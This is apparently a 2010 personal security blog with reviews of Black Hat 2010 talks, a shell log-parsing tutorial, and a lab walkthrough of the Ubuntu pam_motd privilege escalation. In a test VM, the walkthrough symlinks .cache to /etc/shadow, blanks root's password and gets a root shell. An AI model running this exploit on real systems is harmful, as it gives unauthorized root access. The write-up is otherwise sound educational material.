Black Hat Briefings Day 2

July 30th, 2010

I unfortunately was not able to do very much at Black Hat day 2 due to having a ton of work to do to actually make sure the con didn’t fall apart. Mainly I got stuck in helping distribute Defcon badges. It was the first time they have actually given out Defcon badges at Black Hat. I did get to see the keynote though. Day 2′s keynote was (in my opinion) 100x better than Day 1.

Again, this speaker was obsessed with the word “cyber” but he actually used it where appropriate and where it made sense. As he was of the military background, he was talking about how the military has four domains (land, air, water, space) and they are all made by God (or exist naturally if that is what you prefer) but there is a new domain that they have to take into account that is made by man. This is the “Cyber” domain. The key differences between these domains, is not only natural vs unnatural but you can generally apply the same techniques between the 4 natural domains but that is not true in the Cyber domain.

I am not going to go completely into full detailed analysis about his talk but there was nothing that I disagreed with and thought he was absolutely spot on. Again, Ii am not sure if I will return next year for the briefings or if I will just go ahead and hit up B-Sides. We will just have to see what happens as it is another full year away.

Black Hat Briefings Day 1

July 28th, 2010

For anyone interested, here is the schedule for what talks I attended today at Black Hat and the ones I plan on going to tomorrow http://sched.blackhat.com/metacortex. I will go ahead and post my thoughts and opinions on the various different talks.

Started out the day like most conference attendees at the Keynote. The keynote was given by some chick from the DHS. Overall opinion, it was pretty lame. She started right off the bat by saying she wasn’t apart of the security community and it became very apparent along with her lack of any technical knowledge. I don’t expect her to be “super uber 1337 h@x0R” but to have some knowledge of what she was talking about. She kept relating everything to the Army and had a fetish for the word “cyber-space” I would not be surprised to see the word “cyber-space” in the transcript more than 30 times. After the disappointment of the Keynote I made my way down to go see “WPA Migration Mode: WEP is back to haunt you…”

I was hoping “WPA Migration Mode: WEP is back to haunt you…” would be some new tech for cracking WPA but didn’t really know what to expect due to the lack of media coverage. As it turns out, Cisco has this migration mode for when you are moving from WEP to WPA that allows both to be used sanctimoniously and then just bridges the two together. The entire premise of the talk was that people forget to turn this mode off after fully migrating and thus still accepting WEP connections. All though it was not a bad talk, it did not deserve a slot at Black Hat as it is only used by people who

A) Use Cisco wireless gear
B) Try to migrate between WEP and WPA softly
C) Are dumb enough to forget to change it. 

Now, I do not have any personal look into the market and what organizations are doing with their wireless infrastructure but I would imagine that it would be fairly small. In any case, once you find out that they are still accepting WEP connections, it is just business as usual by cracking WEP. I do have to give them a little more credit though. They wrote a patch for aircrack that allowed it to crack this way as it wouldn’t crack it due to a limitation it has for TKIP.

After the WPA stuff I headed down to “Balancing the Pwn Trade Deficit” by the guys at Attack Research. This talk was all about the Chinese hacker scene. It was a really unique talk as they did not take the position of China bashing like it seems the rest of the industry does and I must say I loved it. They talked the cultural differences as you can very clearly see it in their source code as they name things such as variables and functions with J-Pop lyrics. They spent the majority of the time talking about Chinese malware and exploit generators. Going into the talk, I had some small idea about how sophisticated some pieces of malware are such as the zeus-bot but I I was almost dumbfounded by things such as 24/7 support over phone and QQ (Chinese equivalent to ICQ) as well as having to have active accounts with the creators in order to generate an exploit. In the end, it came down to the fact that the Chinese scene is just like the one here in the States where they have the white/black hat classification as well as similar targets and motivations.

Next up was the talk of the year. Mr. Barnaby Jack with his talk on Jackpotting Automated Teller Machines. Got a nice cozy seat up front due to the Blackhat Jersey. He began out with saying that it is not all about the payoff and it was about the journey to the payoff. He went through with us some of his first attempts at getting access into the ATM’s using JTAG interfaces and having to get explorer.exe to execute on it (as they all run Windows CE). Once this was demonstrated, he showed us the tool he created for exploiting the ATM’s called Dillinger where you simply connect to the ATM on its management port. Once you can connect to it, you have the choice of Testing the Exploit, Upload his Root Kit, resetting to defaults, retrieve Credit Card Track Data, or Jackpotting it (photo here). It was incredibly entertaining to see the money fall out of the ATM while it was playing shitty MIDI song. It was absolutely fantastic and left confirming my opinion that he is just a bad-ass.

Now, I decided to go to one of the most brutal talks I have ever seen. I went and saw “Harder, Better, Faster, Stronger: Semi-Auto Vulnerability Research” by the SourceFire VRT guys. As I am not really good at any type of coding or vulnerability development, a lot of it went way over my head but they did introduce a tool that it looks like would almost revolutionize that space.

Last talk of the day was the other one that got a lot of hype, it was “Getting In Bed With Robin Sage”. The basic premise was that he got this hot chick’s picture and posed as a chick in the security industry. Apparently in the end he was able to get job offers from the likes of Google and Lockheed. This was hands down the worst talk I have ever seen in my entire life. The speaker was so incredibly disorganized that he could not, stick to his own slides and spent most of the time getting into it with Chris Nickerson and browsing his file system taunting people with pictures of incriminating emails but never actually opening them to show people. It was so bad, about half of the people got up and left half way through and one guy had to ask him really what exactly he did as he never explained exactly what happened and what he did. At that point, I had to get up and walk out as well.

All in all, it was a little above average. There were some awesome talks but some really downer talks as well. We will see what happens tomorrow but I am thinking I may have to just do the whole BSides thing next year.

Another year of Black Hat/Defcon

July 21st, 2010

Black Hat and Defcon are upon us again this year. This means nothing more than covering miles of ground during setup and tear down of training classes and briefing rooms followed by epic parties with free booze supplied by several top names in the industry. Just to set the record strait, I don’t go to the parties nor the free room in Caesars for a week and a half but I go because I always learn so many new things and come away inspired. I am super excited and cant wait to get there.

Exploiting Ubuntu pam_motd vulnerability

July 12th, 2010

There is a PAM vulnerability in unpatched copies of Ubuntu. According to the Ubuntu (Article Here) it is an issue with the pam_motd module and it allows /etc/shadow to be modified by an unprivileged user. The shadow file is responsible for keeping the hashed copies of user passwords and is usually referenced in /etc/passwd with a single character of ‘x’.

I went ahead and installed a fresh copy of Ubuntu 10.04 Server in a VM to test this out with. The only modification I made was install ssh.

First thing we want to do is login


Ubuntu 10.04 LTS ubuntu tty1

ubuntu login: metacortex
Password:

Once I am in I go ahead and check my current uid


metacortex@ubuntu:~$ id
uid=1001(metacortex) gid=1001(metacortex) groups=1001(metacortex)

Now we can look and see what the default .cache directory contains


metacortex@ubuntu:~$ ls .cache/
motd.legal-displayed

It doesn’t really matter anyway because we are going to go ahead and get rid of it like so


metacortex@ubuntu:~$ rm -rfv .cache/
removed `.cache/motd.legal-displayed’
removed directory: `.cache’

Now to actually take advantage of the vulnerability, we are going to create a soft link to /etc/shadow in place of the .cache directory


metacortex@ubuntu:~$ ln -s /etc/shadow .cache
metacortex@ubuntu:~$ ls -alh
total 20k
drwxr-xr-x 2 metacortex metacortex 4.0k 2010-07-12 14:47 .
drwxr-xr-x 4 root root 4.0k 2010-07-12 14:42 ..
-rw-r–r– 1 metacortex metacortex 220 2010-04-18 20:15 .bash_logout
-rw-r–r– 1 metacortex metacortex 3.1k 2010-04-18 20:15 .bashrc
lrwxrwxrwx 1 metacortex metacortex 11 2010-07-12 14:47 .cache -> /etc/shadow
-rw-r–r– 1 metacortex metacortex 675 2010-04-18 20:15 .profile

With this soft link in place, we have full access to read and write to /etc/shadow


metacortex@ubuntu:~$ vim .cache

In VIM we will see the following


root:*:14802:0:99999:7:::
daemon:*:14802:0:99999:7:::
bin:*:14802:0:99999:7:::
sys:*:14802:0:99999:7:::
sync:*:14802:0:99999:7:::
games:*:14802:0:99999:7:::
man:*:14802:0:99999:7:::
lp:*:14802:0:99999:7:::
mail:*:14802:0:99999:7:::
news:*:14802:0:99999:7:::
uucp:*:14802:0:99999:7:::
proxy:*:14802:0:99999:7:::
www-data:*:14802:0:99999:7:::
backup:*:14802:0:99999:7:::
list:*:14802:0:99999:7:::
irc:*:14802:0:99999:7:::
gnats:*:14802:0:99999:7:::
nobody:*:14802:0:99999:7:::
libuuid:!:14802:0:99999:7:::
syslog:*:14802:0:99999:7:::
landscape:*:14802:0:99999:7:::
metacortex:$6$BMitImGG$7UbQbDGYRu2xyhyzI4ZYC7f1DlH15VfFZQXPlk6nanpPvxLwJI.es
pM7PuHBGruqKR/UpzgEwpf5Ng61:14802:0:99999:7:::
sshd:*:14802:0:99999:7:::
~
~
~
“.cache” 24L, 839C 1,1 All

Now that we have write access to the shadow file, we can do whatever we want with it such as completly removing the root password like this


root::14802:0:99999:7:::
daemon:*:14802:0:99999:7:::
bin:*:14802:0:99999:7:::
sys:*:14802:0:99999:7:::
sync:*:14802:0:99999:7:::
games:*:14802:0:99999:7:::
man:*:14802:0:99999:7:::
lp:*:14802:0:99999:7:::
mail:*:14802:0:99999:7:::
news:*:14802:0:99999:7:::
uucp:*:14802:0:99999:7:::
proxy:*:14802:0:99999:7:::
www-data:*:14802:0:99999:7:::
backup:*:14802:0:99999:7:::
list:*:14802:0:99999:7:::
irc:*:14802:0:99999:7:::
gnats:*:14802:0:99999:7:::
nobody:*:14802:0:99999:7:::
libuuid:!:14802:0:99999:7:::
syslog:*:14802:0:99999:7:::
landscape:*:14802:0:99999:7:::
metacortex:$6$BMitImGG$7UbQbDGYRu2xyhyzI4ZYC7f1DlH15VfFZQXPlk6nanpPvxLwJI.es
pM7PuHBGruqKR/UpzgEwpf5Ng61:14802:0:99999:7:::
sshd:*:14802:0:99999:7:::
~
~
~
“.cache” 24L, 839C 1,1 All

After we save it, we need to re-invoke pam_motd by logging in again


metacortex@ubuntu:~$ ssh localhost
Password:

Now we can feel free to log in as root whenever we would like


metacortex@ubuntu:~$ su -
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~#

I am not sure of the exact technical details as to whats wrong with pam_motd but from what I can tell it allows the motd root access. What I can not figure out is why it does not work the same for /etc/passwd.

*EDIT*
I may have forgotten to re-invoke pam_motd after changing the soft link from shadow to passwd. I am able to own /etc/passwd just as easily as /etc/shadow. I also found this nice little shell script that automates it at packetstorm.

Command-line Fu: Parsing logs

July 7th, 2010

Tonight I was going through some output from a very large debug file for a router. The only information I had to go off of was that file. When I say large, I meanĀ 120955 lines of network debug information. It is far too much to go through manually unless you know exactly what you are looking for. It came up that I needed to look at each individual session that ran through the device. Instead of going though line by line looking for each session, I knew I could script it somehow. Just for reference here is basically what a single packet looks like


Jul 5 10:56:55 10:56:55.923221:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT:<10.6.70.1/2750->10.6.132.1/636;6> matched filter TDS_debug:

Jul 5 10:56:55 10:56:55.923257:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT:packet [40] ipid = 24977, @7a2200e8

Jul 5 10:56:55 10:56:55.923276:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT:—- flow_process_pkt: (thd 14): flow_ctxt type 13, common flag 0×0, mbuf 0xe50a000, rtbl_idx = 2405

Jul 5 10:56:55 10:56:55.923304:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT: flow process pak fast ifl 80 in_ifp reth1.412

Jul 5 10:56:55 10:56:55.923316:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT:flow_np_session_id2nsp: NP hdr: session id – 654724464, Flag – 8

Jul 5 10:56:55 10:56:55.923337:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT: flow session id 413040

Jul 5 10:56:55 10:56:55.923352:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT: vsd 1 is active

Jul 5 10:56:55 10:56:55.923363:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT: tcp seq check.

Jul 5 10:56:55 10:56:55.923371:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT:mbuf 0xe50a000, exit nh 0xec753c2

Jul 5 10:56:55 10:56:55.923388:CID-01:FPC-07:PIC-00:THREAD_ID-14:RT: —– flow_process_pkt rc 0×0 (fp rc 0)

I figured I should match on the source address and source port. You can see source/destination address and port in the following string of the first line


<10.6.70.1/2750->10.6.132.1/636;6>

The first part of my command to filter out just source address and port was


$ cat debug | grep “\<10.6.70.1\/”

Doing just this gave me a whole bunch of lines. Looking through them, I found that some of them were not the lines I was looking for and had to do with NAT so I refined my command even more by adding another grep command on the end of it


cat debug | grep “\<10.6.70.1\/” | grep “matched filter”

Doing this gave me all the lines I wanted. Counting the following output with “wc -l” gave me 2827 lines. This is more manageable than before but still I want to cut out all of the excess fluff on each line and get rid of any duplicate lines. For the fluff, I turned to my friend cut


$ cat debug | grep “\<10.6.70.1\/” | grep “matched filter” | cut -d “<” -f 2

The cut command at the end set a delimiter of the character “<”. The Delimiter tells it where to break up sections into groups. I then passed it the -f flag to tell it to show the second “section” (basically everything to the right of “<”). This gave me several lines like the following


10.6.70.1/2750->10.6.132.1/636;6> matched filter TDS_debug:

I got rid of the fluff at the beginning and now I need to get rid of the fluff at the end


$ cat debug | grep “\<10.6.70.1\/” | grep “matched filter” | cut -d “<” -f 2 | cut -d “-” -f 1

Again, I used cut and I set the delimiter to the character “-” and showed the first colum (everything to the left of the “-”).

With this command I get just the source address and port.


10.6.70.1/2750

All that is left now is to sort them and get rid of any duplicates with the sort and uniq commands


$ cat debug | grep “\<10.6.70.1\/” | grep “matched filter” | cut -d “<” -f 2 | cut -d “-” -f 1 | sort | uniq

Here is an extremely abbreviated output of what I have now


10.6.70.1/2750
10.6.70.1/2752
10.6.70.1/2753
10.6.70.1/2940
10.6.70.1/2941
10.6.70.1/2980
10.6.70.1/2981

Last thing that is left to do is to pipe all that output into a individual file


$ cat debug | grep “\<10.6.70.1\/” | grep “matched filter” | cut -d “<” -f 2 | cut -d “-” -f 1 | sort | uniq > sessions

We are now done and I can file this command away for further use.

 
     
); ?http://www.statcounter.com/free_hit_counter.html